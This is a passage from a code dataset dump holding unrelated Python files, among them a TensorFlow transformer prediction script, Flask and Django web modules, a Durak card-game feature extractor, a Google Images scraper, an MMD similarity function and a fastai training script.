time\r\ntf.app.flags.DEFINE_string(\"ckpt_dir\",\"checkpoint_transformer/\",\"checkpoint location for the model\")\r\ntf.app.flags.DEFINE_integer(\"sequence_length\",25,\"max sentence length\") #100-->25\r\ntf.app.flags.DEFINE_integer(\"embed_size\",512,\"embedding size\")\r\ntf.app.flags.DEFINE_boolean(\"is_training\",False,\"is training. true: training, false: testing/inference\")\r\n#tf.app.flags.DEFINE_string(\"cache_path\",\"text_cnn_checkpoint/data_cache.pik\",\"checkpoint location for the model\")\r\n#train-zhihu4-only-title-all.txt\r\ntf.app.flags.DEFINE_string(\"traning_data_path\",\"train-zhihu4-only-title-all.txt\",\"path of training data.\") #O.K.train-zhihu4-only-title-all.txt-->training-data/test-zhihu4-only-title.txt--->'training-data/train-zhihu5-only-title-multilabel.txt'\r\ntf.app.flags.DEFINE_string(\"word2vec_model_path\",\"zhihu-word2vec-title-desc.bin-512\",\"word2vec's vocabulary and vectors\") #zhihu-word2vec.bin-100-->zhihu-word2vec-multilabel-minicount15.bin-100\r\ntf.app.flags.DEFINE_boolean(\"multi_label_flag\",True,\"use multi label or single label.\") #set this to false, because we are using a sequence of tokens here.\r\ntf.app.flags.DEFINE_float(\"l2_lambda\", 0.0001, \"l2 regularization\")\r\ntf.app.flags.DEFINE_string(\"predict_target_file\",\"checkpoint_transformer/zhihu_result_transformer.csv\",\"target file path for final prediction\")\r\ntf.app.flags.DEFINE_string(\"predict_source_file\",'test-zhihu-forpredict-title-desc-v6.txt',\"source file path for final prediction\") #test-zhihu-forpredict-v4only-title.txt\r\ntf.app.flags.DEFINE_integer(\"decoder_sent_length\",25,\"length of decoder inputs\")\r\n\r\ntf.app.flags.DEFINE_integer(\"d_model\",512,\"hidden size\")\r\ntf.app.flags.DEFINE_integer(\"d_k\",64,\"dimension of keys\")\r\ntf.app.flags.DEFINE_integer(\"d_v\",64,\"dimension of values\")\r\ntf.app.flags.DEFINE_integer(\"h\",8,\"number of attention heads\")\r\ntf.app.flags.DEFINE_integer(\"num_layer\",1,\"number of layers\") #6\r\n#1.load data(X:list of int,y:int). 2.create session. 3.feed data. 
4.training (5.validation) ,(6.prediction)\r\n# 1.load data with vocabulary of words and labels\r\n_GO=\"_GO\"\r\n_END=\"_END\"\r\n_PAD=\"_PAD\"\r\n\r\ndef main(_):\r\n    # 1.load data with vocabulary of words and labels\r\n    vocabulary_word2index, vocabulary_index2word = create_voabulary(word2vec_model_path=FLAGS.word2vec_model_path,name_scope=\"transformer\") # simple='simple'\r\n    vocab_size = len(vocabulary_word2index)\r\n    print(\"transformer.vocab_size:\", vocab_size)\r\n    vocabulary_word2index_label, vocabulary_index2word_label = create_voabulary_label(name_scope=\"transformer\",use_seq2seq=True)\r\n    questionid_question_lists=load_final_test_data(FLAGS.predict_source_file)\r\n    test= load_data_predict(vocabulary_word2index,vocabulary_word2index_label,questionid_question_lists)\r\n    testX=[]\r\n    question_id_list=[]\r\n    for tuple in test:\r\n        question_id,question_string_list=tuple\r\n        question_id_list.append(question_id)\r\n        testX.append(question_string_list)\r\n    # 2.Data preprocessing: Sequence padding\r\n    print(\"start padding....\")\r\n    testX2 = pad_sequences(testX, maxlen=FLAGS.sequence_length, value=0.) # padding to max length\r\n    print(\"end padding...\")\r\n    # 3.create session.\r\n    config=tf.ConfigProto()\r\n    config.gpu_options.allow_growth=True\r\n    with tf.Session(config=config) as sess:\r\n        # 4.Instantiate Model\r\n        model=Transformer(FLAGS.num_classes, FLAGS.learning_rate, FLAGS.batch_size, FLAGS.decay_steps, FLAGS.decay_rate, FLAGS.sequence_length,\r\n                 vocab_size, FLAGS.embed_size,FLAGS.d_model,FLAGS.d_k,FLAGS.d_v,FLAGS.h,FLAGS.num_layer,FLAGS.is_training,decoder_sent_length=FLAGS.decoder_sent_length,l2_lambda=FLAGS.l2_lambda)\r\n        saver=tf.train.Saver()\r\n        if os.path.exists(FLAGS.ckpt_dir+\"checkpoint\"):\r\n            print(\"Restoring Variables from Checkpoint\")\r\n            saver.restore(sess,tf.train.latest_checkpoint(FLAGS.ckpt_dir))\r\n        else:\r\n            print(\"Can't find the checkpoint. Going to stop.\")\r\n            return\r\n        # 5.feed data, to get logits\r\n        number_of_training_data=len(testX2);print(\"number_of_training_data:\",number_of_training_data)\r\n        index=0\r\n        predict_target_file_f = codecs.open(FLAGS.predict_target_file, 'a', 'utf8')\r\n        #decoder_input=np.reshape(np.array([vocabulary_word2index_label[_GO]]+[vocabulary_word2index_label[_PAD]]*(FLAGS.decoder_sent_length-1)),[-1,FLAGS.decoder_sent_length])\r\n        decoder_input=np.full((FLAGS.batch_size,FLAGS.decoder_sent_length),vocabulary_word2index_label[_PAD])\r\n        decoder_input[:,0:1]=vocabulary_word2index_label[_GO] #set all values in first column to _GO\r\n        for start, end in zip(range(0, number_of_training_data, FLAGS.batch_size),range(FLAGS.batch_size, number_of_training_data+1, FLAGS.batch_size)):\r\n            predictions,logits=sess.run([model.predictions,model.logits],\r\n                                        feed_dict={model.input_x:testX2[start:end],\r\n                                                   model.decoder_input:decoder_input,\r\n                                                   model.dropout_keep_prob:1\r\n                                                   })\r\n            ####################################################################################\r\n            #for j in range(FLAGS.decoder_sent_length):\r\n            #    predict = sess.run(model.predictions, #model.loss_val,--->loss, model.train_op\r\n            #                  feed_dict={model.input_x:testX2[start:end],\r\n            #                             model.decoder_input:decoder_input,\r\n            #                             #model.input_y_label: input_y_label,\r\n            #                             model.dropout_keep_prob: 1.0,\r\n            #                            })\r\n            #    decoder_input[:,j] = predict[:,j]\r\n            ####################################################################################\r\n            print(\"===============>\",start,\"predictions:\",predictions)\r\n            # 6. 
get lable using logtis\r\n for _,logit in enumerate(logits):\r\n predicted_labels=get_label_using_logits(logit,predictions,vocabulary_index2word_label,vocabulary_word2index_label)\r\n print(index,\" ;predicted_labels:\",predicted_labels)\r\n # 7. write question id and labels to file system.\r\n write_question_id_with_labels(question_id_list[index],predicted_labels,predict_target_file_f)\r\n index=index+1\r\n predict_target_file_f.close()\r\n\r\ndef get_label_using_logits(logits, predictions,vocabulary_index2word_label,vocabulary_word2index_label, top_number=5):\r\n print(\"logits:\",logits.shape) #(6, 2002)\r\n result_list=[]\r\n for i,row in enumerate(logits):\r\n #print(\"i,\",i,\"row:\",row)\r\n if i!=len(logits)-1: #not include result from last column, which usually it should be TOKEN.\r\n label=process_each_row_get_lable(row,vocabulary_index2word_label,vocabulary_word2index_label,result_list)\r\n result_list.append(label)\r\n return result_list\r\n\r\ndef process_each_row_get_lable(row,vocabulary_index2word_label,vocabulary_word2index_label,result_list):\r\n \"\"\"\r\n :param row: it is a list.length is number of labels. e.g. 2002\r\n :param vocabulary_index2word_label\r\n :param result_list\r\n :return: a lable\r\n \"\"\"\r\n label_list=list(np.argsort(row))\r\n label_list.reverse()\r\n #print(\"label_list:\",label_list) # a list,length is number of labels.\r\n for i,index in enumerate(label_list): # if index is not exists, and not _PAD,_END, then it is the label we want.\r\n #print(i,\"index:\",index)\r\n flag1=vocabulary_index2word_label[index] not in result_list\r\n flag2=index!=vocabulary_word2index_label[_PAD]\r\n flag3=index!=vocabulary_word2index_label[_END]\r\n if flag1 and flag2 and flag3:\r\n #print(\"going to return \")\r\n return vocabulary_index2word_label[index]\r\n\r\n# write question id and labels to file system.\r\ndef write_question_id_with_labels(question_id,labels_list,f):\r\n labels_string=\",\".join(labels_list)\r\n f.write(question_id+\",\"+labels_string+\"\\n\")\r\n\r\nif __name__ == \"__main__\":\r\n tf.app.run()","sub_path":"a07_Transformer/a2_predict.py","file_name":"a2_predict.py","file_ext":"py","file_size_in_byte":9210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"192548215","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.datasets import load_iris\n\nfrom decision_tree import DecisionTreeClassifier\n\n\nif __name__ == '__main__':\n iris = load_iris()\n X = iris.data\n y = iris.target\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=27)\n\n model = DecisionTreeClassifier()\n model.fit(X_train, y_train)\n pred = model.predict(X_test)\n\n acc = accuracy_score(y_test, pred)\n\n print('Accuracy : {}'.format(acc))\n","sub_path":"decision_tree/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"368273319","text":"from flask import Flask, render_template\nimport jsonrpclib\n\nfrom Maraschino import app\nfrom settings import *\nfrom maraschino.noneditable import *\nfrom maraschino.tools import *\n\n@app.route('/xhr/library')\n@requires_auth\ndef xhr_library():\n return render_library()\n\n@app.route('/xhr/library/')\n@requires_auth\ndef xhr_library_root(item_type):\n api_address = server_api_address()\n\n if not api_address:\n return render_library(message=\"You need to configure XBMC 
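Two notes on the prediction code above. First, `print("===============>", start, "predict:", predict)` references `predict`, which is only assigned inside the commented-out greedy-decoding block, so as written it raises a `NameError`; `predictions` is presumably what was meant. Second, the label selection in `process_each_row_get_lable` is a greedy walk over `np.argsort` that skips special tokens and duplicates. A distilled, runnable version of that idea (the vocabulary contents are made up for illustration):

```python
# Distilled version of the label-selection logic above: walk the indices of
# one logits row from highest to lowest score and return the first label
# that is neither a special token nor already chosen. Vocabulary is made up.
import numpy as np

def pick_label(row, index2label, banned_indices, already_chosen):
    for idx in np.argsort(row)[::-1]:  # indices sorted by descending logit
        label = index2label[int(idx)]
        if int(idx) not in banned_indices and label not in already_chosen:
            return label
    return None  # everything was banned or duplicated

index2label = {0: "_PAD", 1: "_END", 2: "music", 3: "sport"}
row = np.array([0.1, 2.0, 0.5, 1.5])
print(pick_label(row, index2label, {0, 1}, set()))  # -> sport
```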
server settings first.\")\n\n try:\n xbmc = jsonrpclib.Server(api_address)\n library = []\n title = \"Movies\"\n\n if item_type == 'movies':\n library = xbmc.VideoLibrary.GetMovies(sort={ 'method': 'label', 'ignorearticle' : True }, properties=['playcount'],)\n\n if item_type == 'shows':\n title = \"TV Shows\"\n library = xbmc.VideoLibrary.GetTVShows(sort={ 'method': 'label', 'ignorearticle' : True }, properties=['playcount'])\n\n except:\n return render_library(message=\"There was a problem connecting to the XBMC server.\")\n\n return render_library(library, title)\n\n@app.route('/xhr/library/shows/')\n@requires_auth\ndef xhr_library_show(show):\n xbmc = jsonrpclib.Server(server_api_address())\n library = xbmc.VideoLibrary.GetSeasons(tvshowid=show, properties=['tvshowid', 'season', 'showtitle', 'playcount'])\n library['tvshowid'] = show\n\n title = library['seasons'][0]['showtitle']\n\n return render_library(library, title)\n\n@app.route('/xhr/library/shows//')\n@requires_auth\ndef xhr_library_season(show, season):\n xbmc = jsonrpclib.Server(server_api_address())\n\n sort = { 'method': 'episode' }\n library = xbmc.VideoLibrary.GetEpisodes(tvshowid=show, season=season, sort=sort, properties=['tvshowid', 'season', 'showtitle', 'episode', 'plot', 'playcount'])\n\n episode = library['episodes'][0]\n title = '%s - Season %s' % (episode['showtitle'], episode['season'])\n\n return render_library(library, title)\n\ndef render_library(library=None, title=\"Media Library\", message=None):\n return render_template('library.html',\n library = library,\n title = title,\n message = message,\n )\n","sub_path":"modules/library.py","file_name":"library.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"552944710","text":"import os\nimport code\n\nfrom flaskext.script import Manager, Server, Shell, Command\n\nfrom app.main import app\n\nmanager = Manager(app)\n\nclass DevServer(Server):\n description = \"Run the local dev server\"\n def handle(self, *args, **kwargs):\n super(DevServer, self).handle(*args, **kwargs)\n\nclass IShell(Shell):\n def run(self, no_ipython):\n \"\"\"\n Runs the shell. 
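The library module above drives XBMC through its JSON-RPC API via `jsonrpclib.Server`. A hedged sketch of that access pattern in isolation — the address is a placeholder, and the method name and result shape follow the `VideoLibrary.GetMovies` call already present in the source:

```python
# Hedged sketch of the JSON-RPC access pattern used in the module above.
# The address is a placeholder; the method and result shape follow the
# VideoLibrary.GetMovies call already present in the source.
import jsonrpclib

def list_movie_labels(api_address="http://127.0.0.1:8080/jsonrpc"):
    xbmc = jsonrpclib.Server(api_address)
    result = xbmc.VideoLibrary.GetMovies(
        sort={"method": "label", "ignorearticle": True},
        properties=["playcount"],
    )
    # XBMC returns {"movies": [...], "limits": {...}}; each movie carries
    # at least "label" plus the requested properties.
    return [movie["label"] for movie in result.get("movies", [])]
```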
Unless no_ipython is True or use_python is False\n then runs IPython shell if that is installed.\n \"\"\"\n\n context = self.get_context()\n if not no_ipython:\n from IPython.frontend.terminal.embed import InteractiveShellEmbed\n sh = InteractiveShellEmbed(banner2=self.banner)\n sh(global_ns=dict(), local_ns=context)\n return\n\n code.interact(self.banner, local=context)\n\ndev_server = DevServer(host='0.0.0.0', port=5001, use_debugger=True, use_reloader=True)\nmanager.add_command('rundev', dev_server)\nmanager.add_command('shell', IShell())\n\nif __name__ == \"__main__\":\n manager.run()\n","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"596552674","text":"import matplotlib.pyplot as plt\n\n# prepare data\nx = [1, 2, 3, 4]\ny = [10, 20, 25, 30]\n\n# create plot\nfig = plt.figure()\n\n# plot\nax = fig.add_subplot(111)\n\n# customize plot\nax.plot(x, y, color='lightblue', linewidth=3)\nax.scatter([2,4,6],\n[5,15,25],\ncolor='darkgreen',\nmarker='^')\nax.set_xlim(1, 6.5)\n\n# save plot\nplt.savefig('plot.png')\n\n# show plot\nplt.show()\n","sub_path":"Python/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"503373600","text":"# FeatureExtractors.py\r\n# --------------------\r\n# Licensing Information: Please do not distribute or publish solutions to this\r\n# project. You are free to use and extend these projects for educational\r\n# purposes. The Pacman AI projects were developed at UC Berkeley, primarily by\r\n# John DeNero (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\r\n# For more info, see http://inst.eecs.berkeley.edu/~cs188/sp09/pacman.html\r\n\r\n\r\nimport Util\r\nfrom Player import choose_min_card\r\n\r\n\r\nclass FeatureExtractor:\r\n def getFeatures(self, state, action):\r\n \"\"\"\r\n Returns a dict from features to counts\r\n Usually, the count will just be 1.0 for\r\n indicator functions.\r\n \"\"\"\r\n Util.raiseNotDefined()\r\n\r\n\r\nclass IdentityExtractor(FeatureExtractor):\r\n def getFeatures(self, state, action):\r\n features = Util.Counter()\r\n features[(state, action)] = 1.0\r\n return features\r\n\r\n\r\nclass LightWeightState:\r\n def __init__(self, player_hand, table_cards, pile_cards, trump_suit):\r\n self.over_ten_reg_cards = \\\r\n [card.number for card in player_hand if\r\n card.suit != trump_suit and card.number > 10]\r\n self.over_ten_trump_cards = \\\r\n [card.number for card in player_hand if\r\n card.suit == trump_suit and card.number > 10]\r\n\r\n self.over_ten_reg_cards_in_pile = \\\r\n [card.number for card in pile_cards if\r\n card.suit != trump_suit and card.number > 10]\r\n self.over_ten_trump_cards_in_pile = \\\r\n [card.number for card in pile_cards if\r\n card.suit == trump_suit and card.number > 10]\r\n\r\n self.table_cards = table_cards\r\n\r\n self.amnt_trump = \\\r\n sum(1 for card in player_hand if card.suit == trump_suit)\r\n self.amnt_non_trump = \\\r\n sum(1 for card in player_hand if card.suit != trump_suit)\r\n\r\n def __repr__(self):\r\n return \"{},{},{},{},{},{},{}\".\\\r\n format(self.over_ten_reg_cards,\r\n self.over_ten_trump_cards,\r\n self.over_ten_reg_cards_in_pile,\r\n self.over_ten_trump_cards_in_pile,\r\n self.table_cards, self.amnt_trump, self.amnt_non_trump)\r\n\r\n def __hash__(self):\r\n return hash(repr(self))\r\n\r\n\r\nclass 
DurakFeatureExtractor(FeatureExtractor):\r\n def get_number_dict(self, player_hand):\r\n ret = Util.Counter()\r\n for card in player_hand:\r\n ret[card.number] += 1\r\n return ret\r\n\r\n def get_suit_dict(self, player_hand):\r\n ret = Util.Counter()\r\n for card in player_hand:\r\n ret[card.suit] += 1\r\n return ret\r\n\r\n def mean_arr(self, arr):\r\n return sum(card.number for card in arr) / (len(arr) * 14) if len(arr) != 0 else 0\r\n\r\n def get_suit_means(self, player_hand):\r\n heart_cards = []\r\n spades_cards = []\r\n diamonds_cards = []\r\n clubs_cards = []\r\n\r\n for card in player_hand:\r\n if card.suit == \"hearts\":\r\n heart_cards.append(card)\r\n elif card.suit == \"clubs\":\r\n clubs_cards.append(card)\r\n elif card.suit == \"diamonds\":\r\n diamonds_cards.append(card)\r\n elif card.suit == \"spades\":\r\n spades_cards.append(card)\r\n\r\n heart_cards_mean = self.mean_arr(heart_cards)\r\n spades_cards_mean = self.mean_arr(spades_cards)\r\n diamonds_cards_mean = self.mean_arr(diamonds_cards)\r\n clubs_cards_mean = self.mean_arr(clubs_cards)\r\n\r\n return heart_cards_mean, spades_cards_mean, diamonds_cards_mean, clubs_cards_mean\r\n\r\n def getFeatures(self, state, action):\r\n features = Util.Counter()\r\n\r\n trump_suit = state.trump_card.suit\r\n player_hand = state.current_player.get_cards()\r\n amount_cards = len(state.current_player.get_cards())\r\n suit_dict = self.get_suit_dict(player_hand)\r\n\r\n features[\"amount_trump\"] = sum(1 for card in player_hand if card.suit == trump_suit) / \\\r\n amount_cards if amount_cards != 0 else 0\r\n\r\n features[\"mean_number\"] = sum(card.number for card in player_hand) / amount_cards\r\n\r\n features[\"variance_number\"] = sum((features[\"mean_number\"] - card.number) ** 2 for card in player_hand) / \\\r\n amount_cards\r\n\r\n variance_mean = sum(suit_dict.values()) / 4\r\n features[\"variance_suit\"] = sum((variance_mean - num_suit) ** 2 for num_suit in suit_dict.values()) / 4\r\n\r\n features[\"cards_diff\"] = (len(state.current_player.get_opponent(state).get_cards()) -\r\n len(state.current_player.get_cards())) / 36\r\n features[\"is_card_minimum\"] = 1 if action == choose_min_card(state.current_player.options(state.table,\r\n state.trump_card.suit),\r\n state.trump_card.suit) else 0\r\n\r\n if len(state.deck.get_cards()) < 6:\r\n features[\"cards_on_hand\"] = -amount_cards / (36 * (len(state.deck.get_cards()) + 1))\r\n\r\n if len(state.deck.get_cards()) == 0:\r\n opponent_hand = state.current_player.get_opponent(state).get_cards()\r\n self_suit_means = self.get_suit_means(player_hand)\r\n opponent_suit_means = self.get_suit_means(opponent_hand)\r\n\r\n features[\"amount_trump_opponent\"] = -sum(1 for card in opponent_hand if card.suit == trump_suit) / \\\r\n len(opponent_hand) if len(opponent_hand) != 0 else 0\r\n\r\n hearts_mean_diff = self_suit_means[0] - opponent_suit_means[0]\r\n spades_mean_diff = self_suit_means[1] - opponent_suit_means[1]\r\n diamnods_mean_diff = self_suit_means[2] - opponent_suit_means[2]\r\n clubs_mean_diff = self_suit_means[3] - opponent_suit_means[3]\r\n features[\"suits_means_diff\"] = (hearts_mean_diff + spades_mean_diff + diamnods_mean_diff + clubs_mean_diff) / 4\r\n\r\n self_trumps = [card.number for card in player_hand if card.suit == trump_suit]\r\n enemy_trumps = [card.number for card in opponent_hand if card.suit == trump_suit]\r\n highest_self_trump = max(self_trumps) if len(self_trumps) != 0 else 0\r\n highest_enemy_trump = max(enemy_trumps) if len(enemy_trumps) != 0 else 0\r\n\r\n 
features[\"highest_trump\"] = 1 if highest_self_trump > highest_enemy_trump else -1\r\n\r\n return features\r\n","sub_path":"git_upload/FeatureExtractors.py","file_name":"FeatureExtractors.py","file_ext":"py","file_size_in_byte":6626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"451878776","text":"start, end = 251811, 251826\r\n\r\nfor n in range( start, end+1 ):\r\n a = [] # массив для хранения делителей\r\n for d in range(1,n+1):\r\n if n % d == 0:\r\n a.append(d)\r\n if len(a) > 4: break\r\n if len(a) == 4:\r\n print( *a )\r\n","sub_path":"tasks_25/solutions/25-6.py","file_name":"25-6.py","file_ext":"py","file_size_in_byte":261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"80114203","text":"from bs4 import BeautifulSoup\nimport requests\nimport re\nimport urllib2\nimport os\nimport argparse\nimport sys\nimport json\nimport random\nimport imghdr\n\n# adapted from http://stackoverflow.com/questions/20716842/python-download-images-from-google-image-search\n\n\ndef delete_files(folder):\n for the_file in os.listdir(folder):\n file_path = os.path.join(folder, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n #elif os.path.isdir(file_path): shutil.rmtree(file_path)\n except Exception as e:\n print(e)\n\n\ndef get_soup(url,header):\n return BeautifulSoup(urllib2.urlopen(urllib2.Request(url,headers=header)),'html.parser')\n\ndef run(max_images, query):\n\twhitelist = set('abcdefghijklmnopqrstuvwxy ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n\tquery = ''.join(filter(whitelist.__contains__, query))\n\tarr = query.split()\n\tquery='+'.join(arr)\n\theader={'User-Agent':\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36\"}\n\turl=\"https://www.google.co.in/search?q=\"+query+\"&source=lnms&tbm=isch\"\n\tsoup = get_soup(url,header)\n\tActualImages=[] # contains the link for Large original images, type of image\n\tfor a in soup.find_all(\"div\",{\"class\":\"rg_meta\"}):\n\t link , Type =json.loads(a.text)[\"ou\"] ,json.loads(a.text)[\"ity\"]\n\t ActualImages.append((link,Type))\n\trandom.shuffle(ActualImages)\n\t\n\ttype = ''\n\n\tfor (url, type) in ActualImages:\n\t print(url, type)\n\t if type == 'jpg' or type == 'jpeg':\n\t return url\n\n\n\nif __name__ == '__main__':\n from sys import argv\n try:\n main(argv)\n except KeyboardInterrupt:\n pass\n sys.exit()\n","sub_path":"flaskbb/scrapers/google_scraper.py","file_name":"google_scraper.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"225830367","text":"import numpy as np\nfrom embed.spectrum import spectrum_map\nfrom falkon import Falkon, kernels\nimport torch\nfrom tqdm import tqdm\n\ndef mmd(seq1=None, seq2=None, emb1=None, emb2=None, mean1=None, mean2=None, embedding='spectrum', kernel='linear', return_pvalue=False, progress=False, **kwargs):\n '''\n Calculates MMD between two sets of sequences. Optionally takes embeddings or mean embeddings of sequences if these have been precomputed for efficiency. If is true, a Monte-Carlo estimate (1000 iterations) of the p-value is returned. 
Note that this is compute-intensive and only implemented for the linear kernel.\n '''\n\n if embedding == 'spectrum':\n embed = spectrum_map\n if embedding == 'profet':\n raise NotImplementedError\n if embedding == 'unirep':\n raise NotImplementedError\n\n if mean1 is None and emb1 is None:\n emb1 = embed(seq1, progress=progress, **kwargs)\n if mean2 is None and emb2 is None:\n emb2 = embed(seq2, progress=progress, **kwargs)\n\n if mean1 is None:\n x = np.mean(emb1, axis=0)\n else:\n x = mean1\n if mean2 is None:\n y = np.mean(emb2, axis=0)\n else:\n y = mean2\n\n if kernel == 'linear':\n MMD = np.sqrt(np.dot(x,x) + np.dot(y,y) - 2*np.dot(x,y))\n if return_pvalue:\n m = len(emb1)\n agg = np.concatenate((emb1,emb2),axis=0)\n mmds = []\n it = tqdm(range(1000)) if progress else range(1000)\n for i in it:\n np.random.shuffle(agg)\n _emb1 = agg[:m]\n _emb2 = agg[m:]\n mmds.append(mmd(emb1=_emb1, emb2=_emb2))\n rank = float(sum([x<=MMD for x in mmds]))+1\n pval = (1000+1-rank)/(1000+1)\n return MMD, pval\n else:\n return MMD\n\n elif kernel == 'gaussian':\n gauss = kernels.GaussianKernel(sigma=1.0)\n x = torch.from_numpy(emb1)\n y = torch.from_numpy(emb2)\n m = float(len(emb1))\n n = float(len(emb2))\n Kxx = gauss(x,x).numpy()\n Kxy = gauss(x,y).numpy()\n Kyy = gauss(y,y).numpy()\n return np.sqrt(\n np.sum(Kxx) / (m**2)\n - 2 * np.sum(Kxy) / (m*n)\n + np.sum(Kyy) / (n**2)\n )\n","sub_path":"metrics/similarity.py","file_name":"similarity.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"294156656","text":"import shutil\nimport gc\nimport torch\n\nimport fastai\nfrom fastai.vision import *\nfrom fastai.widgets import *\nfrom fastai.callbacks import *\n\nprint(\"BRIGHTNESS\")\n\nConfig.DEFAULT_CONFIG = {\n 'data_path': './../data/MURA-v1.1/',\n 'model_path': './models/'\n }\n\nConfig.create('/tmp/myconfig.yml')\nConfig.DEFAULT_CONFIG_PATH = '/tmp/myconfig.yml'\n\npath = Config.data_path()\n\nfnames_train = get_image_files('../data/MURA-v1.1/train/', recurse=True)\nprint(len(fnames_train))\n\nfnames_valid = get_image_files('../data/MURA-v1.1/valid/', recurse=True)\nprint(len(fnames_valid))\n\npat_label = re.compile(r'/XR_([^/]+)/[^/]+/[^/]+/[^/]+.png$')\npat_patient = re.compile(r'/[^/]+/patient([^/]+)/[^/]+/[^/]+.png$')\npat_study = re.compile(r'/([^/]+)_[^/]+/[^/]+.png$')\n\nmura = ['elbow', 'finger', 'forearm', 'hand', 'humerus', 'shoulder', 'wrist']\n\nstudy_train_dict = dict()\nstudy_valid_dict = dict()\n\nfor m in mura:\n study_train_dict[m] = list()\n study_valid_dict[m] = list()\n \nfor src in fnames_train:\n # get image label\n label = pat_label.search(str(src))\n label = label.group(1)\n # get patient number\n patient = pat_patient.search(str(src))\n patient = patient.group(1)\n # get study name\n study = pat_study.search(str(src))\n study = study.group(1)\n # add to label list\n s = 'patient' + patient + '_' + study\n study_train_dict[label.lower()].append(s)\n\nfor src in fnames_valid:\n # get image label\n label = pat_label.search(str(src))\n label = label.group(1)\n # get patient number\n patient = pat_patient.search(str(src))\n patient = patient.group(1)\n # get study name\n study = pat_study.search(str(src))\n study = study.group(1)\n # add to label list\n s = 'patient' + patient + '_' + study\n study_valid_dict[label.lower()].append(s)\n \nnum_train_studies = 0\nnum_valid_studies = 0\n\nfor m in mura:\n # train\n myset = set(study_train_dict[m])\n num_train_studies += len(myset)\n # 
valid\n myset = set(study_valid_dict[m])\n num_valid_studies += len(myset)\n \nsize = 128\nbs = 64\n\nnp.random.seed(24)\ndata = ImageDataBunch.from_folder('../data/MURA-v1.1/data2/', ds_tfms=get_transforms(do_flip=False, max_warp=0.0, p_lighting=0, xtra_tfms=[brightness(change=(0.65,0.65),p=1) ]), size=size, bs=bs).normalize(imagenet_stats)\n\n\nkappa = KappaScore()\nkappa.weights = \"quadratic\"\n\nlearner = cnn_learner(data, models.densenet169, metrics=[error_rate, accuracy, kappa], wd=0.1, model_dir=\"./models/\").to_fp32()\nlearner.fit_one_cycle(10, callbacks=[ShowGraph(learner) ,SaveModelCallback(learner)])\n\nlearner.save('brightness')","sub_path":"data_augmentation/data_augmentation/brightness.py","file_name":"brightness.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"410600330","text":"import logging\n\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.urls import reverse\nfrom wagtail.admin.edit_handlers import MultiFieldPanel, FieldPanel\nfrom wagtail.contrib.frontend_cache.utils import PurgeBatch\n\nfrom wagtail.contrib.settings.models import BaseSetting\nfrom wagtail.contrib.settings.registry import register_setting\nfrom wagtail.core.fields import RichTextField\n\n\n@register_setting\nclass SiteWideAlertSettings(BaseSetting):\n class Meta:\n verbose_name = \"Sitewide alert\"\n\n sitewide_alert_enabled = models.BooleanField(\n default=False, verbose_name=\"Enable sitewide alert\"\n )\n sitewide_alert_text = RichTextField(\n blank=True,\n features=[\"h2\", \"h3\", \"bold\", \"italic\", \"link\"],\n verbose_name=\"Alert text\",\n )\n\n background_colour = models.CharField(\n max_length=6,\n blank=True,\n help_text=\"Background RGB value. e.g. fd5765\"\n )\n text_colour = models.CharField(\n max_length=6,\n blank=True,\n help_text=\"Text colour RGB value. e.g. 
ffffff\"\n )\n\n panels = [\n MultiFieldPanel(\n [FieldPanel(\"sitewide_alert_enabled\"), FieldPanel(\"sitewide_alert_text\")],\n \"Sitewide alert\",\n ),\n MultiFieldPanel(\n [FieldPanel(\"background_colour\"), FieldPanel(\"text_colour\")],\n \"Style\",\n classname=\"collapsible\"\n ),\n ]\n\n def clean(self):\n if self.sitewide_alert_enabled and not self.sitewide_alert_text:\n raise ValidationError(\n {\n \"sitewide_alert_text\": ValidationError(\n \"To enable the sitewide alert, please specify the alert text.\"\n ),\n }\n )\n\n def save(self, *args, **kwargs):\n alert_url = reverse(\"sitewide_alert:sitewide_alert\")\n\n batch = PurgeBatch()\n batch.add_url(alert_url)\n batch.purge()\n logging.info(f\"Frontend cache purged for sitewide alert url ({alert_url})\")\n\n super().save(*args, **kwargs)\n","sub_path":"wagtailio/sitewide_alert/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"498140689","text":"from django.conf.urls.defaults import patterns, include, url\n\nfrom django.conf import settings\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('zimity.views',\n \n url(r'^$', 'home'),\n \n url(r'^users/$', 'user_index'),\n url(r'^users/view/(?P\\d+)/$', 'user_view'),\n url(r'^users/add/$', 'user_add'),\n url(r'^users/edit/(?P\\d+)/$', 'user_edit'),\n \n url(r'^imprint/$', 'imprint_index'),\n url(r'^imprint/view/(?P\\d+)/$', 'imprint_view'),\n url(r'^imprint/add/$', 'imprint_add'),\n 